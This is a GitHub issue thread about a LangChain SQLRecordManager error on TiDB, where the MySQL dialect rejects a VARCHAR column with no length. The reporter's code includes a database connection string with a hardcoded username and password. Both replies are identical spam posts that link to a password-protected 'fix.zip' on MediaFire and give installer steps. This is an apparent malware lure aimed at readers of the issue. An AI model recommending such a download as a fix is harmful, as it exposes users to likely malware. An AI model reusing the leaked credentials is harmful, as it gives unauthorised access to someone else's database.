### ISSUE TITLE
SQL Record Manager

### ISSUE THREAD

**Issue by Hanson-G2G** [langchain-ai/langchain#25795]
### Checked other resources

- [X] I added a very descriptive title to this issue.
- [X] I searched the LangChain documentation with the integrated search.
- [X] I used the GitHub search to find a similar question and didn't find it.
- [X] I am sure that this is a bug in LangChain rather than my code.
- [X] The bug is not resolved by updating to the latest stable version of LangChain (or the specific integration package).

### Example Code

The following code: ```python```
import os
from utils import vec_db
from dotenv import load_dotenv
from langchain.indexes import SQLRecordManager, index
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain_aws.vectorstores.inmemorydb import InMemoryVectorStore

load_dotenv()
collection_name = "vectordb"
namespace = f"memoryDB/{collection_name}"
SQL_RECORD_MANAGER_DB_URL = os.environ.get('SQL_RECORD_MANAGER_DB_URL')
MEMORYDB_CLUSTER_URL=os.environ.get('MEMORYDB_CLUSTER_URL')
POSTGRES_DB_URL=os.environ.get('POSTGRES_DB_URL')
embeddings_model = vec_db.choose_embeddings_model(vec_db.VOYAGE_MODEL)

def train_agent(links):
    record_manager = SQLRecordManager(namespace, db_url="mysql+pymysql://3JUWd9LLVLo9omY.root:yVo9wqYCvoEy0gxz@gateway01.ap-southeast-1.prod.aws.tidbcloud.com:4000/vectordb?ssl_ca=/etc/ssl/cert.pem&ssl_verify_cert=true&ssl_verify_identity=true")
    vector_store = InMemoryVectorStore(
        embedding=embeddings_model,
        index_name=collection_name,
        redis_url="redis://clustercfg.memorydb-test.gltu4g.memorydb.us-west-2.amazonaws.com:6379",
    )
    record_manager.create_schema()
    docs = RecursiveCharacterTextSplitter(separators=["\n\n", "\n", ".", " ", "\u200b", "\uff0c", "\u3001","\uff0e", "\u3002"], chunk_size=1000, chunk_overlap=200).split_documents(get_docs(links=links))
    indexing = index(docs, record_manager, vector_store, cleanup="full")
    return indexing

def get_docs(links=None):
    """
    Load documents from files in specified directories or from provided web links.

    Args:
        links (list or str, optional): A list of URLs or a single URL to load content from.
    
    Returns:
        list: A list of Document objects ready for embedding.
    """
    docs = []
    directory=False
    # Load documents from directories
    if directory:
        for directory in directories:
            files = get_all_files(directory)
            for file_path in files:
                ext = os.path.splitext(file_path)[-1]
                if ext in {'.mhtml', '.csv', '.html', '.json', '.jsonl', '.pdf'}:
                    loader = {
                        '.mhtml': MHTMLLoader,
                        '.csv': CSVLoader,
                        '.html': UnstructuredHTMLLoader,
                        '.json': JSONLoader,
                        '.jsonl': JSONLoader,
                        '.pdf': PyPDFLoader,
                    }[ext](file_path)
                    docs.extend(loader.load())
                else:
                    with open(file_path, 'r', encoding='utf-8') as file:
                        data = file.read()
                        doc = Document(page_content=data, metadata={"source": file_path})
                        docs.append(doc)
    
    # Load documents from provided web links
    if links:
        if isinstance(links, str):
            links = [links]
        for link in links:
            loader = SitemapLoader(web_path=link) if link.endswith(".xml") else FireCrawlLoader(link, mode="crawl")
            docs.extend(loader.load())
    
    return docs

### Error Message and Stack Trace (if applicable)

Traceback (most recent call last):
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/compiler.py", line 6645, in visit_create_table
    processed = self.process(
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/compiler.py", line 915, in process
    return obj._compiler_dispatch(self, **kwargs)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/visitors.py", line 141, in _compiler_dispatch
    return meth(self, **kw)  # type: ignore  # noqa: E501
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/compiler.py", line 6676, in visit_create_column
    text = self.get_column_specification(column, first_pk=first_pk)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/dialects/mysql/base.py", line 1809, in get_column_specification
    self.dialect.type_compiler_instance.process(
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/compiler.py", line 960, in process
    return type_._compiler_dispatch(self, **kw)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/visitors.py", line 141, in _compiler_dispatch
    return meth(self, **kw)  # type: ignore  # noqa: E501
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/compiler.py", line 7236, in visit_string
    return self.visit_VARCHAR(type_, **kw)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/dialects/mysql/base.py", line 2309, in visit_VARCHAR
    raise exc.CompileError(
sqlalchemy.exc.CompileError: VARCHAR requires a length on dialect mysql

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/flask_cors/extension.py", line 165, in wrapped_function
    return cors_after_request(app.make_response(f(*args, **kwargs)))
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/Users/hansonloo/textract-research/website-agent/src/agent.py", line 94, in train
    index = indexing.train_agent([link])
  File "/Users/hansonloo/textract-research/website-agent/src/utils/indexing.py", line 23, in train_agent
    record_manager.create_schema()
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/langchain/indexes/_sql_record_manager.py", line 153, in create_schema
    Base.metadata.create_all(self.engine)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/schema.py", line 5857, in create_all
    bind._run_ddl_visitor(
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/engine/base.py", line 3251, in _run_ddl_visitor
    conn._run_ddl_visitor(visitorcallable, element, **kwargs)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/engine/base.py", line 2457, in _run_ddl_visitor
    visitorcallable(self.dialect, self, **kwargs).traverse_single(element)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/visitors.py", line 664, in traverse_single
    return meth(obj, **kw)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/ddl.py", line 918, in visit_metadata
    self.traverse_single(
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/visitors.py", line 664, in traverse_single
    return meth(obj, **kw)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/ddl.py", line 956, in visit_table
    )._invoke_with(self.connection)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/ddl.py", line 314, in _invoke_with
    return bind.execute(self)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/engine/base.py", line 1418, in execute
    return meth(
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/ddl.py", line 180, in _execute_on_connection
    return connection._execute_ddl(
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/engine/base.py", line 1526, in _execute_ddl
    compiled = ddl.compile(
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/elements.py", line 308, in compile
    return self._compiler(dialect, **kw)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/ddl.py", line 69, in _compiler
    return dialect.ddl_compiler(dialect, self, **kw)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/compiler.py", line 870, in __init__
    self.string = self.process(self.statement, **compile_kwargs)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/compiler.py", line 915, in process
    return obj._compiler_dispatch(self, **kwargs)
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/visitors.py", line 141, in _compiler_dispatch
    return meth(self, **kw)  # type: ignore  # noqa: E501
  File "/Users/hansonloo/miniconda3/envs/website-agent/lib/python3.10/site-packages/sqlalchemy/sql/compiler.py", line 6655, in visit_create_table
    raise exc.CompileError(
sqlalchemy.exc.CompileError: (in table 'upsertion_record', column 'uuid'): VARCHAR requires a length on dialect mysql

### Description

I'm trying to create sql record manager in the TiDB. It should be creating the database in the TiDB side. However, I'm facing bug issue at the line of `record_manager.create_schema()` 

### System Info

System Information
------------------
> OS:  Darwin
> OS Version:  Darwin Kernel Version 23.6.0: Mon Jul 29 21:16:46 PDT 2024; root:xnu-10063.141.2~1/RELEASE_ARM64_T8112
> Python Version:  3.10.14 | packaged by conda-forge | (main, Mar 20 2024, 12:51:49) [Clang 16.0.6 ]

Package Information
-------------------
> langchain_core: 0.2.34
> langchain: 0.2.14
> langchain_community: 0.2.12
> langsmith: 0.1.100
> langchain_anthropic: 0.1.23
> langchain_aws: 0.1.17
> langchain_chroma: 0.1.3
> langchain_experimental: 0.0.64
> langchain_groq: 0.1.9
> langchain_ollama: 0.1.1
> langchain_openai: 0.1.22
> langchain_text_splitters: 0.2.2
> langchain_voyageai: 0.1.1
> langgraph: 0.2.10

Optional packages not installed
-------------------------------
> langserve

Other Dependencies
------------------
> aiohttp: 3.9.5
> anthropic: 0.34.1
> async-timeout: 4.0.3
> boto3: 1.34.154
> chromadb: 0.5.3
> dataclasses-json: 0.6.5
> defusedxml: 0.7.1
> fastapi: 0.112.1
> groq: 0.9.0
> httpx: 0.27.0
> jsonpatch: 1.33
> langgraph-checkpoint: 1.0.4
> numpy: 1.26.4
> ollama: 0.3.1
> openai: 1.37.0
> orjson: 3.9.15
> packaging: 24.1
> pydantic: 2.5.3
> PyYAML: 6.0.1
> requests: 2.32.3
> SQLAlchemy: 2.0.30
> tenacity: 8.2.3
> tiktoken: 0.7.0
> typing-extensions: 4.11.0
> voyageai: 0.2.3

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
